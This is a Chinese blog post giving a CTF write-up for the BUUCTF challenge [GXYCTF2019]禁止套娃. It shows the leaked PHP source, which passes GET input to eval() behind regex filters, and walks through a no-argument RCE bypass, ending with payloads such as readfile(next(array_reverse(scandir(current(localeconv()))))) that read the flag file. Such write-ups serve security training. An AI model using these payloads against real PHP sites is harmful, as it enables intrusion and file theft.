练[GXYCTF2019]禁止套娃

最新推荐文章于 2024-05-16 20:52:07 发布
最新推荐文章于 2024-05-16 20:52:07 发布
阅读量96 收藏 1
点赞数 3
分类专栏: buuctf刷题 文章标签: linux web安全 笔记 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133418818
版权

[GXYCTF2019]禁止套娃

文章目录


在这里插入图片描述

掌握知识

​ 目录扫描工具,git源码泄露,代码审计,正则匹配,无参数函数进行RCE

解题思路

  1. 页面没什么内容,查看源码也没有hint,开始进行目录扫描,发现了git目录,想到是.git源码泄露的考点

image-20230929163608663

image-202309291637036192. 通过使用githack工具成功得到了index.php文件,接下来就开始进行代码审计,对代码进行解析了,代码如下

image-20230929163753426

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>
代码分析
  1. 该代码的目的肯定就是执行最后的eval函数了,一上来就看到了三个正则匹配的字段了,首先第一个正则匹配判断的是不能使用常见的几个伪协议
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp']))
  1. 第二个是正则匹配替换字符串,这个正则有些眼熟,毕竟使用?R的还是很少的,之前学习无参数的命令执行见到过[^\W]+\((?R)?\),该正则目的就是检测函数不能带有参数。接下来对每个字段进行解释
[^\W]  会匹配所有数字和字母已经_,也就是[a-ZA-Z0-9_]    也就是加强版的[a-z,_]
[a-z_]+\(?\)  会匹配到a()形式的字符串也就是常见的函数类型,但是不能含有参数  
(?R)  代表递归 和外面的结构一致  也就是a(b(c()))这种形式会被匹配到  函数里面递归函数  都是无参数的
所以[a-z_]+\((?R)?\)  就是a()  a(b())这种格式的字符串才会被匹配到,然后替换为空
所以只需要在传参的最后加上;  即可通过此次匹配   这也就是无参数RCE的匹配方式

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
  1. 最后一个正则也好理解,和第一个一致,不能出现下面的内容即可,然后就可以调用eval对传入的参数进行代码执行了
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']))
解题过程
  1. 分析结束,最简单的无参数RCE的验证就是phpinfo();函数了,但是匹配了info,证明也确实通过了前两个正则

image-20230929155448171

  1. 查看最后一个正则匹配的字段,再查看搜集的payload,发现使用scandir()进行文件读取没有被限制。直接使用paylaod查看当前目录下的所有文件/?exp=print_r(scandir(current(localeconv())));scandir里面的函数会返回字符.print_r是为了回显

image-20230929162429797

  1. 发现了flag文件是在第三个数组内,可以使用多个next()递归查看,但也可以使用 array_reverse()反转数组在结合next()锁定flag文件,最后使用文件读取函数替换print_r即可拿下flag。文件读取函数有很多,这个函数正好前几天写华为杯碰到了。。
?exp=readfile(next(array_reverse(scandir(current(localeconv())))));

image-20230929163246254

image-20230929163241436

  1. 其实无参数RCE可以使用的方法还是很多的,每个都有着不同的payload,可以应该不同的过滤,比如利用HTTP请求头(用到get...),利用全局变量(用到get...),利用session(会用到hex2bin)都是可以的,只不过这道题不适用

关键paylaod

python dirsearch.py -u http://...

python githack.py http://...

/?exp=print_r(scandir(current(localeconv())));

/?exp=print_r(next(array_reverse(scandir(current(localeconv())))));

/?exp=readfile(next(array_reverse(scandir(current(localeconv())))));
生而逢时
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1299
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
[GXYCTF2019]禁止套娃 1
qq_43618536的博客
07-04 367
BUUCTF的[GXYCTF2019]禁止套娃 1
[GXYCTF2019]禁止套娃
weixin_45751765的博客
11-25 366
0x00 前言 写这篇主要巩固一下正则,难度不是特别大 递归正则属于是盲区了 0x01 Sunwear 看看页面空空如也,抓包看看也是空空如也 果断扫一下 Githack一把梭 拿到index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET
[GXYCTF2019]禁止套娃--详解
金 帛的博客
06-12 2278
BUUCTF记录贴
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法)
2301_76690905的博客
10-28 376
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3391
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
[GXYCTF2019]禁止套娃1(两种方法)
m0_62879498的博客
05-02 4364
[GXYCTF2019]禁止套娃 1 进入环境,只有一串字符 查看源代码 抓包 什么都没有发现 尝试使用御剑进行目录爆破 也只是爆出了index.php 然后 尝试直接使用 php伪协议进行一个 flag 读取 但都失败了。在这种情况下,肯定是服务器进行了一个过滤。所以,我怀疑可能是源码泄露 。 尝试使用 GitHack 看看是不是源码泄露 GitHack 下载地址:https://github.com/lijiejie/GitHack 扒下了网站的源码 好了,现在就是代码审计了 最吸引眼球
web buuctf [GXYCTF2019]禁止套娃1
weixin_44214568的博客
03-24 1702
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
buuctf-[GXYCTF2019]禁止套娃(小宇特详解)
小宇的web博客
02-12 1175
buuctf-[GXYCTF2019]禁止套娃(小宇特详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
俄罗斯套娃程序及设计
06-09
2.在递归函数调用时记录路经(保存在向量path_now中),并记录当前的套娃总重(score_now)。 3.走过的没有套娃的路口,将其值修改为HPZD(即0XFFFFFFFF),表明该路口已走过。 4.当递归函数返回时恢复path_now和score...
俄罗斯套娃奖品Java程序
08-12
网上有套娃的VC程序,c程序,这是我改写的Java版本。
俄罗斯套娃奖品C++程序
05-19
非常经典的程序,曾是中兴“捧月杯”参赛程序。程序里面使用使用C++编程
俄罗斯套娃
04-17
俄罗斯套娃动作数据
俄罗斯套娃问题 回溯法
08-01
俄罗斯套娃问题 采用递归、回溯法解决俄罗斯套娃问题
Linux知识点笔记
exercise_smile的博客
05-16 527
Linux 主要的发行版(release):Ubuntu(乌班图)、 RedHat(红帽)、 CentOS、 Debain[蝶变]、 Fedora、 SuSE、 OpenSUSE [示意图]在 linux 中的每个用户必须属于一个组, 不能独立于组外。在 linux 中每个文件 有所有者、 所在组、 其它组的概念。ls -l 中显示的内容如下:0-9 位说明:第 0 位确定文件类型(d, - , l , c , b)l 是链接, 相当于 windows 的快捷方式。
jumpserver中添加linux和windows
qq_48736646的博客
05-16 160
前提准备;安装好jumpserver,安装好ldap,使用ldap对接到jumpserver中,并且开启mfa认证。可以参考:https://blog.csdn.net/qq_48736646/article/details/138950532对于建立连接。linux和windows都差不多windows-现在要做的:部署一个远程的windows,普通用户通过jumpserver跳转到个人账户的windows上。
Linux基于Tomcat构建Java web环境操作流程
mark4541437的博客
05-16 254
如果界面跳转至默认的Tomcat界面,证明Java Web环境搭建完成。就可以在公网访问云服务器的8080端口了。• 登录弹性云服务器,执行如下命令,新建jdk目录和tomcat目录。为云服务器添加web项目分配端口的访问规则,例如8080端口为例。• 使用wget命令直接下载安装包至云服务器。http://云服务器弹性公网IP:8080。验证Java Web环境搭建完成。• 设置弹性云服务器安全组规则。• 在浏览器输入以下内容。• 安装tomcat。
Linux FT260驱动内核学习笔记
pq的博客
05-12 775
系统采用Ubuntu 22,X86 64。
Linux 内核开发 25 - 中的 cpuidle subsystem 介绍
最新发布
jxusthusiwen的专栏
05-16 309
总的来说, cpuidle 子系统是 Linux 内核中实现 CPU 电源管理的重要组件,通过动态检测 CPU 的使用状态,选择合适的低功耗状态,并提供统一的管理接口,从而提高系统的能源效率。2. 选择低功耗状态:cpuidle 子系统会根据当前 CPU 的状态和系统的需求,选择最合适的低功耗状态,例如 C1、C2、C3 等。3. 进入低功耗状态:cpuidle 子系统会调用特定的 CPU 指令将 CPU 切换到选择的低功耗状态,需要先保存 CPU 的上下文。
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值